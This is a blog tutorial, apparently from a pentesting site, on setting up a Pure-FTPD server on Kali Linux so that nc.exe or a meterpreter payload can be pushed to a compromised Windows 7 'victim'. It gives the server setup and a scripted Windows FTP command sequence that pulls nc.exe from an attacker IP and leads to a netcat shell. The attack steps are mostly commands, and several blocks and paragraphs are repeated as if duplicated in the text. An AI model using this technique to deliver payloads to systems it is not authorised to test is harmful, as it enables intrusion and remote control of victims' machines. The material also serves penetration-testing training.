In this article, we will learn about creating an FTP server to transfer an advanced payload like meterpreter to the victim machine. This is very much convenient and reliable when transferring to the Windows machine as FTP client is already installed and enabled in all of them.
Now we have to create a system user and a group that will represent virtual FTP users when he gets logged in. We will give a null shell and null directory to the user-created for the FTP server. Check the newly created FTP user with id command.
Now create a home directory for the FTP user. Here we create a separate directory in root-filesystem and changed the owner to the (ftpuser) system user we already created. Check the permissions with ls command.
Find Netcat windows executable in Kali with these commands and copy nc.exe file to our ftp-home directory.
Now create an actual FTP user that gets logged in remotely.
Pure-FTPD supports multiple backend database systems. We will use default here.
Now start the Pure-ftpd service and check that port 21 is listening or not.
Now you can see that nc.exe file will get downloaded into our current directory and we can execute that file to get more advanced shell with netcat.
FTP:
FTP is an acronym of the file transfer protocol. This protocol allows us to upload and download a file from the FTP server with or without authentication. FTP works on TCP protocol, which provides a reliable means for the transfer of data.
Attacker IP address: 192.168.1.73
Tools using:
Tools using:
Kali Linux as OS
Pure-ftpd as FTP server
Windows7 OS as the victim
To install and configure the FTP server on Kali Linux we will need to install the pure-ftpd server on it, as Kali does not preinstall any FTP server into it.
[root@PentestPundit:~]apt-get install pure-ftpd
Now we have to create a system user and a group that will represent virtual FTP users when he gets logged in. We will give a null shell and null directory to the user-created for the FTP server. Check the newly created FTP user with id command.
root@PentestPundit:~]groupadd ftpgroup
[root@PentestPundit:~]useradd -g ftpgroup -s /dev/null -d /dev/null ftpuser
[root@PentestPundit:~]id ftpuser
uid=1001(ftpuser) gid=1001(ftpgroup) groups=1001(ftpgroup)
[root@PentestPundit:~]useradd -g ftpgroup -s /dev/null -d /dev/null ftpuser
[root@PentestPundit:~]id ftpuser
uid=1001(ftpuser) gid=1001(ftpgroup) groups=1001(ftpgroup)
Now create a home directory for the FTP user. Here we create a separate directory in root-filesystem and changed the owner to the (ftpuser) system user we already created. Check the permissions with ls command.
[root@PentestPundit:~]mkdir /ftp-home
[root@PentestPundit:~]chown -R ftpuser:ftpgroup /ftp-home/
[root@PentestPundit:~]ls -la /ftp-home/
[root@PentestPundit:~]chown -R ftpuser:ftpgroup /ftp-home/
[root@PentestPundit:~]ls -la /ftp-home/
Find Netcat windows executable in Kali with these commands and copy nc.exe file to our ftp-home directory.
[root@PentestPundit:~]locate nc.exe
/usr/share/windows-resources/binaries/nc.exe
[root@PentestPundit:~]cp /usr/share/windows-resources/binaries/nc.exe /ftp-home/nc.exe
/usr/share/windows-resources/binaries/nc.exe
[root@PentestPundit:~]cp /usr/share/windows-resources/binaries/nc.exe /ftp-home/nc.exe
Now create an actual FTP user that gets logged in remotely.
[root@PentestPundit:~]pure-pw useradd pentester -u ftpuser -d /ftp-home/
Password:
Enter it again:
[root@PentestPundit:~]pure-pw mkdb
Password:
Enter it again:
[root@PentestPundit:~]pure-pw mkdb
Pure-FTPD supports multiple backend database systems. We will use default here.
[root@PentestPundit:~]cd /etc/pure-ftpd/auth/
[root@PentestPundit:/etc/pure-ftpd/auth]ln -s ../conf/PureDB 60pdb
[root@PentestPundit:/etc/pure-ftpd/auth]ln -s ../conf/PureDB 60pdb
Now start the Pure-ftpd service and check that port 21 is listening or not.
[root@PentestPundit:/etc/pure-ftpd/auth]service pure-ftpd start
[root@PentestPundit:/etc/pure-ftpd/auth]netstat -antlp | grep 21
[root@PentestPundit:/etc/pure-ftpd/auth]netstat -antlp | grep 21
On Victim Shell:
On victim shell, create a text file with the command-line shell with following commands in it. Then provide this text file as a file containing FTP commands to the victim's FTP client.
c:\> echo open 192.168.1.73 21> ftp.txt
c:\> echo USER pentester>> ftp.txt
c:\> echo pentester>> ftp.txt
c:\> echo bin >> ftp.txt
c:\> echo GET nc.exe >> ftp.txt
c:\> echo bye >> ftp.txt
c:\> ftp -v -n -s:ftp.txt
c:\> echo USER pentester>> ftp.txt
c:\> echo pentester>> ftp.txt
c:\> echo bin >> ftp.txt
c:\> echo GET nc.exe >> ftp.txt
c:\> echo bye >> ftp.txt
c:\> ftp -v -n -s:ftp.txt
No comments:
Post a Comment